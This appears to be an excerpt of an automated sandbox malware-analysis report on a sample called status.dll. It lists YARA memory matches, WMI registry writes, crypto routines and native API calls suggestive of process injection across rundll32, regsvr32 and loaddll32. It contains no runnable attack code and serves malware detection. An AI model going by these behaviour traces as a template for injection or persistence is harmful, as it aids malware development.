Source: Yara match File source: 00000005.00000003.349294200.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349136332.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330265188.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.343128725.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339561457.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338125787.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338174961.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338136102.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349238253.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.333735051.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330104762.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330149161.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339592221.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349114643.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339580367.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349219356.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338105591.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.323045956.0000000004CB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339543632.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.334273561.00000000052B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330131368.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339627226.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 2944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6944, type: MEMORYSTR
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 1_2_017D4872
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D44872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 4_2_02D44872
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 5_2_04AA4872
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 6_2_00AC4872

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Uses 32bit PE files
Source: status.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Yara signature match
Source: 00000006.00000002.476168753.000000000069B000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
Source: 00000021.00000002.386067444.00000121EDC9B000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
Source: 00000005.00000003.463693625.000000000308F000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D81DC 1_2_017D81DC
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D6C62 1_2_017D6C62
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D4EF3 1_2_017D4EF3
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0DF9 1_2_00FE0DF9
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0DF7 1_2_00FE0DF7
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B09314 1_2_03B09314
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B01FD5 1_2_03B01FD5
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B17FC6 1_2_03B17FC6
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B15E19 1_2_03B15E19
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B08572 1_2_03B08572
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D44EF3 4_2_02D44EF3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D46C62 4_2_02D46C62
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D481DC 4_2_02D481DC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960DF7 4_2_00960DF7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960DF9 4_2_00960DF9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E8572 4_2_048E8572
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F5E19 4_2_048F5E19
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F7FC6 4_2_048F7FC6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E1FD5 4_2_048E1FD5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_04903724 4_2_04903724
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E9314 4_2_048E9314
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA4EF3 5_2_04AA4EF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA6C62 5_2_04AA6C62
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA81DC 5_2_04AA81DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0DF9 5_2_031C0DF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0DF7 5_2_031C0DF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05918572 5_2_05918572
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05911FD5 5_2_05911FD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05927FC6 5_2_05927FC6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05933724 5_2_05933724
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05925E19 5_2_05925E19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05919314 5_2_05919314
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC4EF3 6_2_00AC4EF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC6C62 6_2_00AC6C62
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC81DC 6_2_00AC81DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00999314 6_2_00999314
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00998572 6_2_00998572
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A5E19 6_2_009A5E19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00991FD5 6_2_00991FD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A7FC6 6_2_009A7FC6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009B3724 6_2_009B3724
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B05BD0 CreateProcessAsUserW, 1_2_03B05BD0
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D77BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_017D77BB
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D462B GetProcAddress,NtCreateSection,memset, 1_2_017D462B
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D2A0A NtMapViewOfSection, 1_2_017D2A0A
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D8401 NtQueryVirtualMemory, 1_2_017D8401
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0AB8 NtProtectVirtualMemory, 1_2_00FE0AB8
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0880 NtAllocateVirtualMemory, 1_2_00FE0880
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B141EE memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 1_2_03B141EE
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0F6C4 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 1_2_03B0F6C4
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B03D90 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 1_2_03B03D90
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0ECB4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_03B0ECB4
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0DC0B NtQueryInformationProcess, 1_2_03B0DC0B
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B1EC5A RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 1_2_03B1EC5A
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B1945C GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 1_2_03B1945C
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B143A0 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 1_2_03B143A0
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B1DBFA NtQuerySystemInformation,RtlNtStatusToDosError, 1_2_03B1DBFA
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B13B11 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_03B13B11
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0EB58 memset,NtQueryInformationProcess, 1_2_03B0EB58
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B061AD OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 1_2_03B061AD
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0C084 VirtualAlloc,VirtualAlloc,GetLastError,GetLastError,SwitchToThread,GetLastError,GetLastError,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlExitUserThread,NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 1_2_03B0C084
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0B012 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 1_2_03B0B012
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B1A044 NtGetContextThread,RtlNtStatusToDosError, 1_2_03B1A044
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B116BA NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_03B116BA
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B1D52D NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_03B1D52D
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0C423 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 1_2_03B0C423
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D42A0A NtMapViewOfSection, 4_2_02D42A0A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D4462B GetProcAddress,NtCreateSection,memset, 4_2_02D4462B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D477BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 4_2_02D477BB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D48401 NtQueryVirtualMemory, 4_2_02D48401
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960880 NtAllocateVirtualMemory, 4_2_00960880
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960AB8 NtProtectVirtualMemory, 4_2_00960AB8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048EECB4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 4_2_048EECB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048EDC0B NtQueryInformationProcess, 4_2_048EDC0B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F945C GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 4_2_048F945C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048FEC5A RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 4_2_048FEC5A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E3D90 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 4_2_048E3D90
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048EF6C4 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 4_2_048EF6C4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F41EE memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 4_2_048F41EE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048EC423 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 4_2_048EC423
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048FD52D NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_048FD52D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F16BA NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_048F16BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048EC084 VirtualAlloc,VirtualAlloc,GetLastError,GetLastError,SwitchToThread,GetLastError,GetLastError,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlExitUserThread,NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 4_2_048EC084
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048EB012 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 4_2_048EB012
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048FA044 NtGetContextThread,RtlNtStatusToDosError, 4_2_048FA044
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E61AD OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 4_2_048E61AD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F43A0 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 4_2_048F43A0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048FDBFA NtQuerySystemInformation,RtlNtStatusToDosError, 4_2_048FDBFA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F3B11 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_048F3B11
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048EEB58 memset,NtQueryInformationProcess, 4_2_048EEB58
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA462B GetProcAddress,NtCreateSection,memset, 5_2_04AA462B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA2A0A NtMapViewOfSection, 5_2_04AA2A0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA77BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 5_2_04AA77BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA8401 NtQueryVirtualMemory, 5_2_04AA8401
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0880 NtAllocateVirtualMemory, 5_2_031C0880
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0AB8 NtProtectVirtualMemory, 5_2_031C0AB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05913D90 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 5_2_05913D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0591ECB4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 5_2_0591ECB4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0591DC0B NtQueryInformationProcess, 5_2_0591DC0B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0592EC5A RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 5_2_0592EC5A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0592945C GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 5_2_0592945C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0591F6C4 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 5_2_0591F6C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_059241EE memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 5_2_059241EE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0592D52D NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 5_2_0592D52D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0591C423 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 5_2_0591C423
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_059216BA NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 5_2_059216BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_059161AD OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 5_2_059161AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0591C084 VirtualAlloc,VirtualAlloc,GetLastError,GetLastError,SwitchToThread,GetLastError,GetLastError,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlExitUserThread,NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 5_2_0591C084
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0591B012 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 5_2_0591B012
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0592A044 NtGetContextThread,RtlNtStatusToDosError, 5_2_0592A044
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_059243A0 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 5_2_059243A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0592DBFA NtQuerySystemInformation,RtlNtStatusToDosError, 5_2_0592DBFA
